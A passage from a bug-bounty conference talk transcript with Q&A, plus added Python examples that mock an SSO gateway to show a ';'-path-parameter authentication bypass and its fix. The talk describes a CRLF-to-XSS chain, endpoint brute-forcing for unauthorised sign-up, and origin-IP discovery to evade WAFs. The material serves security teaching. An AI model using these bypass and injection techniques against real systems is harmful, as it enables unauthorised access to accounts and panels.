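    then collapse '.' and '..' (so '/x/..;/admin' also becomes '/admin')."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))
    return posixpath.normpath(stripped)


def hardened_requires_sso(raw_path):
    """Fix: decide on the same view of the path the application will route on."""
    return gateway_requires_sso(container_route(raw_path))


def differential(baseline_status, probes):
    """The talk's extension brute-force: probes whose status differs from the SSO-redirect baseline."""
    return sorted(path for path, status in probes.items() if status != baseline_status)


def walk(raw_path):
    """One row of the comparison: (gateway view, container view, hardened view)."""
    return gateway_requires_sso(raw_path), container_route(raw_path), hardened_requires_sso(raw_path)


if __name__ == "__main__":
    # constructed probe results, mirroring the talk's recap
    print(differential(302, {"/test.php": 302, "/test.js": 302, "/test.jpg": 404}))
    for p in ("/admin", "/admin;.jpg", "/static/..;/admin", "/logo.png"):
        print(f"{p:20} gateway-sso={walk(p)[0]!s:5} routes-to={walk(p)[1]:8} hardened-sso={walk(p)[2]}")
```

The 404 on `/test.jpg` is the tell: it means the gateway let the request through to the application for that extension, and the `;` trick then makes the application see a different path than the gateway did. Normalising path parameters before the authorisation decision (or refusing `;` in paths outright) removes the gap.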

while doing this, just looking for the CNAME of this specific domain, I just find, okay, this is like a-third-party.com or completely-another-domain.com that's not, like, the company's. By using again [unclear] and trying to gather endpoints [unclear] and stuff, you can find other subdomains on that same CNAME domain which say, okay, notifications/register, that lives in one of the subdomains, and you might think, okay, maybe I can gather all these endpoints that are living on this specific domain and try to brute-force them on my target and see how it goes. And luckily you just get 200 OK, you can just sign up easily. So this was one of the bugs I

found on some programs, just by doing that: by checking the CNAME, reversing it, checking the endpoints on that domain, gathering them all together, building a wordlist, brute-forcing on my target, I just got that /authentication/register which was living under my target, and so I could just sign up and get access to the panel. The last title of this talk is going to be another cross-site scripting. I love when things are interesting; I don't love when it's easy, because you have more fun when it's difficult. If it's just too easy, you just go, do this stuff, and you're done. That's not fun at all, you know.

So we had this specific JavaScript file which has, okay, so we're going to take an inc parameter here. The application expects an inc parameter, and the hostname supplied in the parameter has to end with .org.com, and the path of the supplied parameter URL should start with /includes/jscdn. And so the application, once you supply a valid payload for what it is expecting, is just going to get the content of the file and include the script on the page. What do we need? We need something that looks like this: subdomain.org.com/includes/jscdn/, the specific path, and a .js file which will contain an XSS payload such as alert.

At this point you just think, okay, let me search for a subdomain takeover. But what happens if you don't have one? That's the interesting point here. If you don't have one, maybe you will try to get code execution on some other subdomains and try to maybe write the files even though you don't have the permission to. That's not a good way. You have to try to chain all the vulnerabilities, trying to gather other data that you have saved while hunting on the application, seeing what might be used to finally pop the alert. Subdomain takeover, create the .js file? No luck, no takeover. Are there any other possibilities? So while hunting on the same target, I

found that another subdomain of the target had a CRLF vulnerability. At this point we had this subdomain here, and by doing that we get CRLF very easily. So what happens if we do support.org.com, and the CRLF wasn't on the endpoint but it was like an application-level issue, so any path had this specific CRLF? So what happens if we do that? We just include the path the vulnerable script is expecting, I'm adding the CRLF after that with the content we want, and here we just go, okay, so let's use the CRLF to host the file, the file that we will be using to

cross-load on the other vulnerable endpoint, and check how it's going. So we put this payload which says, okay, set Content-Type equal to application/javascript, and also set the alert, at the end, like at the start of the file. So at this point you can think that, okay, we're just going to include that link inside the parameter and that it might work, but once I tried to do that I had a problem here, because there were CORS issues. The application wasn't letting me load that other subdomain because of CORS issues. What can we do here? Let's set Access-Control-Allow-Origin on the CRLF. So here we just use

the CRLF first to set the Access-Control-Allow-Origin, we also use the CRLF to set the Content-Type, also use the CRLF to write the payload, alert, at the start of the file, and now we can just use that to cross-load, and just, yeah, here we go back and finally we have it popping. So, yeah, I just wanted to mention also that we're launching Web Immunify, which is a pentest company, so if any of you guys need a pentest you can just contact us. Thank you. Questions? So this is really... thank you so much.

So this is an iceberg, and you can see that the discovered vulnerabilities part is really small, and the yet-to-be-found part is really huge. As Yasin said earlier, a good hacker, when it comes to a program, just sees, like, 1000 vulnerabilities found? That's nothing, that's nothing at all, because I think differently than you, you might think differently than that other person. Everyone has his own techniques, everyone has his own mindset for hacking, so what you might find, another might not find. So you just go for it and test it, you don't know what might happen there. I'm here now to answer three questions.

thank you for the light
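The extension-wordlist probing and the JSP path-parameter trick from the talk, worked through as an added example in Python; this is not the speaker's code or the slides' payload. The gateway and backend below are constructed in-memory mocks of the behaviour he describes: most extensions get 403, everything else bounces to SSO with a 302, but image extensions are forwarded unauthenticated to a backend that, like a servlet container, strips ";..." path parameters before routing. The exact payload shape on the slides is not on the page, so the "/admin;.jpg" form and the /admin path are assumptions.

```python
"""Added example (not the speaker's code): probe a gateway with an extension
wordlist, pick the odd-one-out extension, and turn it into a path-parameter
bypass against a JSP-style backend. Everything here is an in-memory mock."""
from collections import Counter

BLOCKED_EXTENSIONS = {".php", ".html", ".js", ".jsp", ".txt", ".xml"}
PASSTHROUGH_EXTENSIONS = {".jpg", ".png", ".gif"}
PROTECTED = {"/admin": "<h1>admin panel</h1>"}   # constructed backend content


def _extension(path):
    """Extension as the gateway sees it: taken from the raw last segment."""
    last = path.rsplit("/", 1)[-1]
    return "." + last.rsplit(".", 1)[-1].lower() if "." in last else ""


def mock_backend(path):
    """Servlet-container style routing: ';param' is dropped from every segment,
    so '/admin;.jpg' and '/admin/;.jpg' both resolve to '/admin'."""
    clean = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    clean = clean.rstrip("/") or "/"
    if clean in PROTECTED:
        return 200, PROTECTED[clean]
    return 404, ""


def mock_gateway(path):
    """Mock SSO gateway (internal.org.com); it decides on the raw path only."""
    ext = _extension(path)
    if ext in BLOCKED_EXTENSIONS:
        return 403, ""
    if ext in PASSTHROUGH_EXTENSIONS:
        return mock_backend(path)      # 'just an image': forwarded without auth
    return 302, ""                     # anything else is sent to SSO


def probe_extensions(request, base_path, extensions):
    """Map each extension in the wordlist to the status for base_path + ext."""
    return {ext: request(base_path + ext)[0] for ext in extensions}


def outlier_extensions(statuses):
    """Extensions whose status differs from the most common answer (the
    '.php 403, .html 403, ... but .jpg 404' observation)."""
    common = Counter(statuses.values()).most_common(1)[0][0]
    return sorted(ext for ext, st in statuses.items() if st != common)


def bypass_candidates(base_path, ext):
    """Path-parameter variants: the gateway still sees the harmless extension,
    the backend normalises the ';...' part away (assumed payload shapes)."""
    return [f"{base_path};{ext}", f"{base_path}/;{ext}", f"{base_path};x{ext}"]


def find_bypass(request, base_path, extensions):
    """Full flow: probe, pick the outliers, try the candidates, return hits."""
    statuses = probe_extensions(request, base_path, extensions)
    hits = []
    for ext in outlier_extensions(statuses):
        for candidate in bypass_candidates(base_path, ext):
            status, body = request(candidate)
            if status == 200 and body:
                hits.append((candidate, status))
    return statuses, hits


if __name__ == "__main__":
    wordlist = [".php", ".html", ".js", ".jsp", ".txt", ".jpg"]
    statuses, hits = find_bypass(mock_gateway, "/admin", wordlist)
    for ext, st in statuses.items():
        print(f"/admin{ext:<6} -> {st}")
    for url, st in hits:
        print(f"bypass: {url} -> {st}")
```

Against a real target, `request` would be a function wrapping an HTTP client; the point of separating the probe from the candidates is that the "different response" extension is what tells you which suffix the front end treats as static content, and the candidate list is where the JSP-specific ";" trick goes.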

Any questions? Yeah, hello sir. Sorry, where are you? Here. Okay, man. Hey, thanks for the talk. I have only two questions that I'm asking since the morning. Sorry, can you... Yeah, I can hear you. I have only two main questions, and those two questions I am asking every pentester that I know. Yeah. First question is how to get to know the non-mainstream bugs. Like, we know about XSS, we know about SQLi, but there are non-mainstream bugs like the OAuth 2.0 ones which we really don't know. Can you repeat what kind of vulnerabilities you're looking for? Oh, actually, what I meant to ask is how do we, how

do we get to know the non-mainstream bugs? How do we get to know, not the name of non-mainstream bugs, but the mainstream bugs? Yeah, yeah, not mainstream. It's like the first vulnerability we have tried to showcase here, which was like account takeover via invitation confusion. No, these are like assets I know about, right? No, no, the first one, where you're here, the first title of the... So it's like business logic issues you're looking for, kind of? Kind of, yes. Yeah, that's by reading documentation mostly. So if you don't read the documentation and you don't understand how the application works, you might not find what is not expected. But it's not mainstream. By reading the

documentation and trying to understand how the application works, you might be able to understand that, oops, okay, this is not intended, so I might be able to try this, and if it works, this is the vulnerability. If you don't know how the application... A lot of hackers just go and say, okay, I have this application, I'm hacking on it, no problem, I'm just going to try SQL injection, cross-site scripting, and they just skip the business logic issues, while it's really interesting to look for them because fewer people read documentation and try to understand the application's purpose. So the second question is: before hunting a bug you have to know the bug, and

before knowing the bug you need to follow a certain type of framework, a certain type of steps. I want to know what are your steps to learn a certain kind of bug. I didn't get the last part, sorry. I want to know about the methodology, how you learn about a bug. How I learn about the bug? Which one? Any kind of bug, like, say there is a new zero-day that comes and you have to learn about it, so what are the steps, what type of framework do you follow to learn about the bug? Yeah, for example, PortSwigger does a lot of labs, and there are a lot of technique showcases on

blogs, and they do a lot of labs, so I think they cover pretty much everything. So you just have to go and try to replay the labs, try to think how, why it's working, and don't cheat, you know, so just try the labs on your own. If you don't get it, you can go and see the solutions, go to the other level. Also TryHackMe, the platform, also does really great work for learning. You might just go learn, even, or reading, try to reproduce. The most important is practicing on real targets. Just take some big targets with a lot of in-scope domains, like Yahoo for example, everything is in scope there, and

just try to replicate. That's going to be a good way to start. Yeah, there's someone in the middle, I think.

Hello. Hey man. If we have to choose between, like, bug bounty or any certification, so what should be our first priority, any certification related or bug bounty? Because if we choose bug bounty, we usually don't get time for certifications and all the other skills like pentesting and networking. Okay, so if I get your question, you're asking what you should do, either bug bounty or certificates? Certificates, like, should we focus on skills or bug bounty? Like, sometimes we need to focus on skills, like pentesting and all the other kinds. Depends what your goals are. You have to know what you want to do.

So if you're just here for bug bounty, you don't need certificates for bug bounty, but if you're trying to get a job or something, they might ask you for a certificate, so you have to know where you're going. So yeah. Yeah, if you're trying to land a job as a pentester, for example, some companies might ask you, do you have certificates? It might help you get the job more easily. But if you're just going to do full bug bounty, you don't need anyone to see any certificates of yours. You just have your own skills, you don't need any certificates. But yeah, that really depends on your goals, what you're looking to do.

I have another question, actually. I have a situation in which I was able to inject XSS from CRLF, but the thing is the parameter, the dot, is blocked by the firewall, like we cannot insert that. So what should be the best practice, what kind of attack, CRLF to XSS? Yeah. Why do you need that, like document.cookie? Okay, but you can use others, there's a lot of other things you might use. Can you do, like, two or three, only just to pop an alert? I tried some tricks but they didn't work, like most of the parameters are blocked by the firewall. Yeah, you have a lot of JavaScript alternatives you can use besides that. Maybe also what you might be

able to do is, like, trying to make the CRLF load another script, an outside script, where you will have your full payload. Do you understand what I mean? Okay. So using the CRLF to just create a script that is going to fetch another script, an external script, and then using it. Message me the endpoint on Twitter, okay, I'll try to locate it. Do you have other questions? First of all, amazing talk, loved it. My question to you is, do you think that bug bounty can be pursued as a full-time career, and if yes, then how do you deal with the mental stress and frustration? So, can you do bug bounty as a

full-time career? You can, but are you ready for that? Are you ready to... it all depends. The interesting thing is that if you're able to set aside some money that might keep you secure for one or two years forward, you can go for bug bounty. But I don't recommend going for bug bounty full time if you can't secure at least one or two years of monthly expenses, life expenses, because you don't know what might happen. Today you might find a lot of bugs, two months later you burn out, nothing, zero bugs, zero money coming in, and you don't have anything saved. So that's really complicated. And how do you deal with the mental

frustration? How do you free yourself from the exhaustion and all those things? Sorry? How do you free yourself from the exhaustion of not finding bugs? So what do you do in your free time? I just go out, that's it. If I can't find bugs, I can't find bugs. It means that my mind isn't ready to look for bugs. It's just like, you're overwhelmed, man, it happens, you're not robots. If you just can't find bugs and you feel like you don't want to hack, only hack when you feel like you want to hack, not when you think that you have to hack. Only when you feel like it, because if

you hack because in your head you have to, obviously it's not going to be productive at all, and it's not going to be fun. Thank you. My pleasure. Hi. Hello. So my question is, you know, many times while finding vulnerabilities on programs there are web application firewalls, and they are updated to the latest version, so how do you usually find bypasses for them? Okay, so first thing, have you tried looking for origin IP addresses? Yeah. Like, from the web you can also get all sorts of content, like, you know, someone has just posted a bypass on Twitter or somewhere else, and you have

tried all of them, then what do you do? Like, you know, there is HTML injection and you can verify that thing, but you want to escalate and create some impact, like maybe cross-site scripting, or, you know, you are trying for SQL injection and it's not working due to the web application firewall. A particular payload you want to try and it's not working, so how do you usually try to bypass it? So, bypassing, I think it's not something that you might be able to summarize in one answer, because this is so big, you know. You have a lot of kinds of bypasses. Recently, when we had the Intigriti event for the WAF bypass

contest, there were a lot of great bypasses from other hackers. Even though I also sent some vulnerabilities, other people were playing with headers, or other people were playing with the main application, just trying to fool the WAF. But what I always try to do first is, I'm going to spend a lot of time trying to find the origin IP, so once and for all I have the IP address, the origin IP address, then I don't have to break my head trying to bypass any payload for any future vulnerability I get, be it SQL injection or other vulnerabilities. So now the question is, how do you

find the origin IP address in some application? I'm just going to showcase some techniques out of my head right now. First, if you can get the ASNs of the application, you just grab all the ASNs, extract all the hosts inside of this, get the IP ranges, and try to check for all live HTTP servers. You get the title from your website and you compare, to try to find the same title on the IPs. This way you might find the origin IP address. Another thing is that, for example, if the application is using a mail server on their own server, so when you do, for

example, a password reset, and you just send it to an email on Burp Collaborator, you're going to get an IP there. If the application is hosting the webmail on their own servers, we're going to get the IP there. And you have a lot of other techniques there, but I will make sure, if you ping me on Twitter, I will send you the links to the other hackers' bypasses in the WAF contest, and there is a lot to learn from there. I learned a lot from them, really great articles. Yeah, cool, thanks. Thank you, man. My pleasure. Hey man. Yeah, the light is blinding. So, yeah. Yeah, so you can talk. Interesting findings. I just wanted to

ask about one of the bugs you showed, which was the CRLF injection. Yeah. The XSS was using a subdomain. Does it also, like, can you execute the script from a subdomain? Like, is it not protected by the same-origin policy? Is it not protected by the same-origin policy, because the XSS, the alert you posted, was on a subdomain and not the domain, right? Yeah, exactly, that's why we added the Access-Control-Allow-Origin headers. So here, can you see, in red? Okay, okay, okay. So we just loaded it using the CRLF. Yeah. Yeah, thank you.

It's okay. Hello. Hey, hey, who's talking? Yeah, where are you? Oh, out there behind the lights, man. Okay, yeah, yeah, sorry about that. Yeah, it's okay. What I want to ask is a pretty general question. So the thing is, there are a lot of ways to approach a particular bug, right? For example LFI, you have multiple bypasses for that, like you can encode and everything, like you showcased in your presentation. Exactly. So just in case the application is not vulnerable, let's say, how do you stop on a particular test case? Like, it's pretty easy to get hung up on a particular test case and try over and over again. So how do you

actually approach this situation? So can you repeat the last part? So actually, it is pretty easy to get hung up on a particular test case, since for any particular test case you have multiple bypasses and multiple ways of approaching a particular bug. Yeah. So how do you make sure that you cover the maximum test cases and, you know... Yeah, I mean, it's like return on investment of time. So if you're going to spend, like, 24 hours on one endpoint and not catching something from it, it's not worth it, you know. Yeah. So if you try different things for, like, for example, for one hour, you just try and it doesn't

work out, it doesn't mean you have to stick to it, you know. That's a mistake I also do, I do it myself, but you have to just save it off, try to go hack on other things, and then come back to it when you have more ideas to try. There is obviously, as an answer to your question, it's never too many techniques, it's never too much. It's not like, okay, I've tested this amount of techniques, it's not working, so I'm out. No, it's never too much. You have to go to the end of what you think might be working. But yeah, just like

one hour, if it doesn't work out, okay, I'm out for today, going to think again about other attacks, coming back, you know. Okay, okay, thank you, that cleared it up. Thank you. Last one here. He was, uh, last. Yeah, it's been like one hour, it's like, ah, save me.

It was a nice talk, thank you. My questions are, first of all, how to bypass sandboxing? How to bypass sandbox? And what kind of sandbox, on a website or web apps, do you mean? For example, remote command execution sandboxes, like when the application is sandboxed. Oh, that's going to take a talk. Okay. Okay, then maybe let's skip to the second question, that is, how can we identify rabbit hole vulnerabilities? How can we identify rabbit hole vulnerabilities? It's like we think that that is a vulnerability which will be... Let's imagine that we are testing an application, or we are scanning it for bug bounty, and we try

some bugs which we think can work, but eventually it's not there, it won't work. So is there any way that we can find directly that these are the vulnerabilities which are not actually going to work, even if it seems like it will work? That's all by experience. And also you can automate these kinds of things, for example you are taking some endpoints from Wayback URLs and just automating cross-site scripting on it. That's going to be easy for you to know that, okay, all these endpoints are not vulnerable to that, or SQL injection, if you automate, you know. But you can just assume that something is not

going to work? That's a really bad idea, to assume that something is not going to work. You have to give all your time, try to bypass, try to exploit something, and if manually, because you can't rely on automation too much, if manually you see that it's not working, then there is no way around, it's just not working. Or maybe you don't have the good skills yet to achieve it, but in the future you just go back to it and you will find it. Thank you so much. Thank you, everyone. Thank you. Thank you so much, Hussein. I'm very sure that, just like me, everybody else has been looking forward to his talk, and

it has been worth the wait, correct? Let's give a round of applause for Hussein. Thank you.